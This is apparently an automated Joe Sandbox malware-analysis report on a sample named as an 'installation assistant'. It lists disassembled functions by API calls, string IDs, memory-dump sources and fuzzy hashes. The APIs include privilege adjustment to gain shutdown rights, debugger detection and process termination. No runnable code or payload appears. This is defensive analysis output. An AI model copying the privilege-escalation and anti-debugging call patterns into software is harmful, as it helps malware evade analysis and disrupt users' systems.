                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                          • Instruction ID: a0ec8b4dbb89aa8b122b453a590b150c71aaa8962d66665afc1be00cba1e91fe
                                          • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                          • Instruction Fuzzy Hash:
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: _strlen
                                          • String ID: g)''
                                          • API String ID: 4218353326-3487984327
                                          • Opcode ID: 21208dd9c6241b52c39521e4f934649b7ce7d465a86605b053e1398c13d1f991
                                          • Instruction ID: 11c8932d05050579d5debd5894a7f896100b204d653018455f7db017f37a9403
                                          • Opcode Fuzzy Hash: 21208dd9c6241b52c39521e4f934649b7ce7d465a86605b053e1398c13d1f991
                                          • Instruction Fuzzy Hash: F4630431645B018FC728CF28C9D0A95B7F3BFD53187198A6DC0EA5BA59EB74B44ACB40
                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 6C7B5D6A
                                          • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6C7B5D76
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6C7B5D84
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6C7B5DAB
                                          • NtInitiatePowerAction.NTDLL ref: 6C7B5DBF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                                          • String ID: SeShutdownPrivilege
                                          • API String ID: 3256374457-3733053543
                                          • Opcode ID: 85d03ccd315b2139987dc86bbbec79a9bbeda70d06d3db2aa1ef7752a34239a5
                                          • Instruction ID: ed7c1b3655899bd76693de8ee5dd668d4d098111e5066ba122ce2f26b4a52e06
                                          • Opcode Fuzzy Hash: 85d03ccd315b2139987dc86bbbec79a9bbeda70d06d3db2aa1ef7752a34239a5
                                          • Instruction Fuzzy Hash: F4F0B470644300BBEA106B24DE0FB9A7BB4EFC5705F014628F945A60D1E7706998CBD6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: \j`7$\j`7$j
                                          • API String ID: 0-3644614255
                                          • Opcode ID: 87e2480f1bef3d0dc6c1f53789074b93e084c651fc949edbf7b66180cd443fa0
                                          • Instruction ID: e63645eb99b498b13bcffb961c7cccd6fee9bc7c219a92d5adc0fc96066a5f5b
                                          • Opcode Fuzzy Hash: 87e2480f1bef3d0dc6c1f53789074b93e084c651fc949edbf7b66180cd443fa0
                                          • Instruction Fuzzy Hash: BE424374609392CFCB24CF28C48165ABBE1BBC9314F146A2EE499CB7A1D334D945CB57
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 6C816CE5
                                            • Part of subcall function 6C7ECC2A: __EH_prolog.LIBCMT ref: 6C7ECC2F
                                            • Part of subcall function 6C7EE6A6: __EH_prolog.LIBCMT ref: 6C7EE6AB
                                            • Part of subcall function 6C816A0E: __EH_prolog.LIBCMT ref: 6C816A13
                                            • Part of subcall function 6C816837: __EH_prolog.LIBCMT ref: 6C81683C
                                            • Part of subcall function 6C81A143: __EH_prolog.LIBCMT ref: 6C81A148
                                            • Part of subcall function 6C81A143: ctype.LIBCPMT ref: 6C81A16C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog$ctype
                                          • String ID:
                                          • API String ID: 1039218491-3916222277
                                          • Opcode ID: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                                          • Instruction ID: b9473507c065efa3e5418e1e7bb4b79e65b0fbd5059a0eea033ae1968c2c1c3c
                                          • Opcode Fuzzy Hash: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                                          • Instruction Fuzzy Hash: D303C03180825ADFDF21CFA8CA48BDCBBB0AF15318F2484A9D44567A91DB345F8DCB61
                                          APIs
                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6C7C0279
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6C7C0283
                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 6C7C0290
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID:
                                          • API String ID: 3906539128-0
                                          • Opcode ID: 3e65909e0caec2565caa44eed92edefe0d9fa6517d48c79499558d663a174f0b
                                          • Instruction ID: d92796a1731542150cba0823c0aa58e96dbbd9451780a6847d9b0cbf39dc2b26
                                          • Opcode Fuzzy Hash: 3e65909e0caec2565caa44eed92edefe0d9fa6517d48c79499558d663a174f0b
                                          • Instruction Fuzzy Hash: 1031927590122DDBCB61DF68D988BCDBBB8BF08314F5042EAE41DA7250EB709B858F45
                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,?,6C7BF235,?,?,?,?), ref: 6C7BF19F
                                          • TerminateProcess.KERNEL32(00000000,?,6C7BF235,?,?,?,?), ref: 6C7BF1A6
                                          • ExitProcess.KERNEL32 ref: 6C7BF1B8
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          • API String ID: 1703294689-0
                                          • Opcode ID: e005e87528321e2c14226c2b237e330af3c6cf30851f5ed9659f2caf1884b4f8
                                          • Instruction ID: 3f9bcb5f8d5d13467717992bf00ffccc370b5d9666f42a42186f9af415e92fdc
                                          • Opcode Fuzzy Hash: e005e87528321e2c14226c2b237e330af3c6cf30851f5ed9659f2caf1884b4f8
                                          • Instruction Fuzzy Hash: F4E0463A102108AFCF426F94CA0CA993B38FB4A79AB000824F818D6630CB39D981DA40
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: x=J
                                          • API String ID: 3519838083-1497497802
                                          • Opcode ID: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                                          • Instruction ID: a74588756cf0caa454df1d272a2bd9db15d17f08861001b510b3503720ffedd6
                                          • Opcode Fuzzy Hash: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                                          • Instruction Fuzzy Hash: D6910433D01209DACF04DFA8CA88AEDBB75FF6D35CF20806AD4516BA51DB325949CB50
                                          APIs
                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6C7B78B0
                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6C7B80D3
                                            • Part of subcall function 6C7B9379: RaiseException.KERNEL32(E06D7363,00000001,00000003,6C7B80BC,00000000,?,?,?,6C7B80BC,?,6C7E554C), ref: 6C7B93D9
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: ExceptionFeaturePresentProcessorRaisestd::invalid_argument::invalid_argument
                                          • String ID:
                                          • API String ID: 915016180-0
                                          • Opcode ID: 2b7ba31abbde8b55ca5049308198407b95f26c005f2869ee3c15cb2d6e84b731
                                          • Instruction ID: 4167655ef424916aac151d51b07e264862d77efec98b2265018fbcfc2ad82558
                                          • Opcode Fuzzy Hash: 2b7ba31abbde8b55ca5049308198407b95f26c005f2869ee3c15cb2d6e84b731
                                          • Instruction Fuzzy Hash: 1CB1DE71A04609ABCB15CF55C98169EFBB4FB59318F24823ED416F7680E734E948CFA4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @4J$DsL
                                          • API String ID: 0-2004129199
                                          • Opcode ID: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                                          • Instruction ID: 139334188a32b686a31c7c1e961d15fa8260d60bb3b93920e7f754bc176e18ab
                                          • Opcode Fuzzy Hash: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                                          • Instruction Fuzzy Hash: 45217137AA49564BE74CCA68DC33EB92681E744305B89527EE94BCB7D1DF6D8800C648
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 6C80540F
                                            • Part of subcall function 6C806137: __EH_prolog.LIBCMT ref: 6C80613C
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                                          • Instruction ID: 978c65236188e12fb97e9a829bfba310cded602fa3e38cb6d6c607cf0239fc7f
                                          • Opcode Fuzzy Hash: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                                          • Instruction Fuzzy Hash: 19628D71A00359CFDF25CF98CA94BDEBBB1BF04308F14496AE815AB680D7749A45CFA4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: YA1
                                          • API String ID: 0-613462611
                                          • Opcode ID: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                                          • Instruction ID: 477fee4db3029f71f430893624851c9a7962a9a6abf30685096a656483f898b1
                                          • Opcode Fuzzy Hash: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                                          • Instruction Fuzzy Hash: 8142F5706083818FC365CF28C69069ABBE2FFD9308F554D6EE8D58B741D6B1D856CB82
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: __aullrem
                                          • String ID:
                                          • API String ID: 3758378126-0
                                          • Opcode ID: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                                          • Instruction ID: 5e4481f93bd6e23b5c2962cbcf99a3c88b28e5ee668576b037d24460a91aee57
                                          • Opcode Fuzzy Hash: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                                          • Instruction Fuzzy Hash: 4F51E671A092859BD710CF5AC4C12EAFBF6AF79214F18C05EE8C897342D27A599BC760
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          • Opcode ID: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                                          • Instruction ID: 4d3d5e76309b8c7e347c3e21514121d56a5dd99c06c9a231847f565212ca77a2
                                          • Opcode Fuzzy Hash: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                                          • Instruction Fuzzy Hash: AC029A316083A08BD325CF2ACA9479EBBE2EFC8348F144E2DE4D597B51C7759945CB82
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (SL
                                          • API String ID: 0-669240678
                                          • Opcode ID: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                                          • Instruction ID: 2e79977988b4cc91f88ed62cfd7318d145d4374469b03105bd1037211f4b6376
                                          • Opcode Fuzzy Hash: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                                          • Instruction Fuzzy Hash: 2D519573E208314AD79CCE24DC2177572D2E784310F8BC1B99D4BAB6E6CD78589087C4
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3901934d13cb486671902a8639e4417b1e8cd50483714420dc8c7fa42b5c990c
                                          • Instruction ID: 2d53bde53788f00f72950e8903c418ea5595bf6805a579a08ce71532dcef272a
                                          • Opcode Fuzzy Hash: 3901934d13cb486671902a8639e4417b1e8cd50483714420dc8c7fa42b5c990c
                                          • Instruction Fuzzy Hash: 92524E31608B858BD329CF2AC69466AB7E2BB95308F144E2DD4DAC7F41DB70F845CB49
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                                          • Instruction ID: c2d137120552fdef550a9b02bf95f98fd2d1ef6df0878e8d695477891d2c1d19
                                          • Opcode Fuzzy Hash: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                                          • Instruction Fuzzy Hash: 5162F3B1A093458FC724CF19C68065EBBE2BFC8744F149E2EE89987714E770E845CB62
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ae17103ab74f7c7ba27116ddf20acfa1a33030b9793f89cfab32f42cff4eb5f1
                                          • Instruction ID: e3356cba2816989ce45cfa86c0ba219d1a6c057bb97d370bb4c8fd4c4026e9ce
                                          • Opcode Fuzzy Hash: ae17103ab74f7c7ba27116ddf20acfa1a33030b9793f89cfab32f42cff4eb5f1
                                          • Instruction Fuzzy Hash: 0C126A712097458BC728CF2AC6E066EBBE2BFC8344F64892DE99687F41D731E845CB51
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                                          • Instruction ID: aa55a0abe9cec5f4b98a2673b19978a1067ffe0604fde21ea2d5788e79ec98c2
                                          • Opcode Fuzzy Hash: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                                          • Instruction Fuzzy Hash: D602D732A082118BD339CE28C5D025DBBE2FBC4355F194F2EE49697A94E7749844CFA2
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1d22da7b9f01d20fe9c2b0fcfce1f7ad9ec50e907d9644d55dcb606a953bfaed
                                          • Instruction ID: 25f7ba54df7da32d12fb680d59f810b88f0cc0639ba1fdf05065ca66bfe20b5c
                                          • Opcode Fuzzy Hash: 1d22da7b9f01d20fe9c2b0fcfce1f7ad9ec50e907d9644d55dcb606a953bfaed
                                          • Instruction Fuzzy Hash: 25F113326042888BEB74CE28D5907EEB7E2FBD5304F94493DD889CBB41DB75950AC792
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                                          • Instruction ID: c88e392dfc290d5bec6162d7d7043f81f9ea8f28dfb9b688fa3a80d9ddc05bde
                                          • Opcode Fuzzy Hash: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                                          • Instruction Fuzzy Hash: BBD100715046168FD328CF1EC594736BBE2EF96304F054ABDD9A28BB9AD734E905CB40
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                                          • Instruction ID: 0b816ed6aaf62aae4c7b0a54c98e39bf1323d03e4373e153e032bd7ea7a68cfa
                                          • Opcode Fuzzy Hash: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                                          • Instruction Fuzzy Hash: 6EC1E5352047458BC328CE3ED1E4696BBE2AFDA314F148AADC4CA4BF55DA34A80DCB55
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                                          • Instruction ID: 55ca8c370476e8cc77d6d5934f032d22fe5f29cfa399d6319146191820c9b71c
                                          • Opcode Fuzzy Hash: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
